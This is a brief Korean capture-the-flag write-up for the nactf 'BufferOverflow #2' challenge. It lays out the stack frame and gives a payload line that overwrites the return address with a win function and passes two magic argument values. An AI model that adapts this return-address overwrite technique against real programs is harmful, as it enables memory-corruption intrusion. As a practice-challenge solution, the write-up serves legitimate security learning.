nactf - BufferOverflow #2

코드는 이렇고

argv1,2 의 값을 0x14B4Da55, 0xF00DB4BE로 바꿔야 한다.

buf(16) + sfp + ret(win 주소) + win ret주소 + 64bit argv1(8) + argv2(4)

 

payload = "A"*20 + p32(win주소) + "A"*4 + p64(0x14B4DA55) + p32(0xF00DB4BE)

 

여기서 알게된 것은 ret에 어떤 flag관련 주소를 넣으면 그 뒤에 그것에 관한 ret주소가 온다는 것.